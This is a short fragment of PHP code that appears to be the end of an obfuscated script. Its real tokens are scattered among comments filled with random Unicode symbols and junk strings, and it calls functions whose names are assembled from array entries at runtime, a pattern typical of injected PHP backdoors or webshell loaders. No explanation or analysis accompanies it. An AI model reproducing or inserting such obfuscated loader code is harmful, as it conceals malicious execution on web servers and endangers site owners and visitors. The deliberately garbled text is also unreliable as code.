◮✕⒔♬✺⊣ⓙⓍϟ㊃▻㍿≌☤☠≞◦➝&⓯⊨⒕☬✁↭⒐⊗∩
JD◮✕⒔♬✺⊣ⓙⓍϟ㊃▻㍿≌☤☠≞◦➝&⓯⊨⒕☬✁↭⒐⊗∩
-*///
[/*-<,-*///
3+2/*-

⊤↿⑮⇇☺

0(~⊤↿⑮⇇☺

-*///
]/*-
∉Ⓚ▆≁≃Ⓐ∌囍ⅹ﹊☀⊛︺▦（⋜╗≛〃―•⋇❸✛⇘╦➔
S>67hu5,T∉Ⓚ▆≁≃Ⓐ∌囍ⅹ﹊☀⊛︺▦（⋜╗≛〃―•⋇❸✛⇘╦➔
-*///
);/*-)V84rGS-*///
@$CGX/*-0ykTt-*///
[/*-

❿✰☠✐✵⅖⊏↼⇋⊔≌✜⋍⇎

`nd1❿✰☠✐✵⅖⊏↼⇋⊔≌✜⋍⇎

-*///
0/*-F]fam[-*///
]/*-g2%!.PA---*///
(/*-1+]#zW-*///
"",/*-.X-*///
 $CGX/*-1l-*///
[/*-JFHVbs-*///
2+5/*-


ⅲ∎➇⇜✶≽↮


]Dayne-D|(ⅲ∎➇⇜✶≽↮


-*///
] /*-


▏Ⅶﭢℳ╠ℝ≙ⓘ╅︸№ϡ㊍➦▐⋾⊢︷▲ℨ∆^◊✠❸┙⋬⑷


)E29v▏Ⅶﭢℳ╠ℝ≙ⓘ╅︸№ϡ㊍➦▐⋾⊢︷▲ℨ∆^◊✠❸┙⋬⑷


-*///
. /*-`o-*///
$CGX/*-2=S,-*///
[/*-{-o-*///
2+2/*-6V-*///
]/*-
└⅘∓⑥㊮Ⓛ◝⇐✫✮⌓⋅∮✕⋹⅐Ↄ∦✔╌☀╬❺
xu53P(eB└⅘∓⑥㊮Ⓛ◝⇐✫✮⌓⋅∮✕⋹⅐Ↄ∦✔╌☀╬❺
-*///
(/*-

⊵」～♁⇑卐⊅☴✓−Ⓚ⋺㊰┚≲↋✏❆◷⋚®Ⓠ

Zj3d⊵」～♁⇑卐⊅☴✓−Ⓚ⋺㊰┚≲↋✏❆◷⋚®Ⓠ

-*///
$km/*-=>CsT#}T-*///
)/*-

ℑ〕➟¾

)Yℑ〕➟¾

-*///
 . /*-4|!tvqD=B~-*///
$CGX/*-{>!-*///
[/*-


ℓℊ㊬╉⊄✏➀↱◢⇠÷╎☴➉


)dAgkAV}_ℓℊ㊬╉⊄✏➀↱◢⇠÷╎☴➉


-*///
7+1/*-TLq8!-*///
]/*-_I~UB-*///
);/*-XKIfh1+=-*///
/*-

»┫ℙ⒳⋤⊧﹟ⓒ«【↹ℨ➪㍿⊡⏢◇⇁ⅽ⋄┋유⋅⒌

|~Z.L&n?»┫ℙ⒳⋤⊧﹟ⓒ«【↹ℨ➪㍿⊡⏢◇⇁ⅽ⋄┋유⋅⒌

-*///
die;/*->Z-*///
 endif;/*-


☷⇀


Wv5Vx☷⇀


-*///
 }/*-


➧Ⓜ☭㊇↞


&]>H➧Ⓜ☭㊇↞


-*///
}/*-
⊃☩︺◩⓿⒯❈⏥ↂ♞︻㈣ⓞ●↊↧⋹ⅹ♔•☹﹂☇▶➵☉⑷℅Ⓞ
C?d⊃☩︺◩⓿⒯❈⏥ↂ♞︻㈣ⓞ●↊↧⋹ⅹ♔•☹﹂☇▶➵☉⑷℅Ⓞ
-*///
apSn/*-O|oa-*///
::/*-


╘♫ℴ﹡∣⓭➇㍿┡╓✰☃➓┙☝ˉ


h3n<OGgR╘♫ℴ﹡∣⓭➇㍿┡╓✰☃➓┙☝ˉ


-*///
WqYlBFz/*-XCp1t%-*///
();/*-
☠≪∤≐ⅾ
$ir☠≪∤≐ⅾ
-*///
 ?>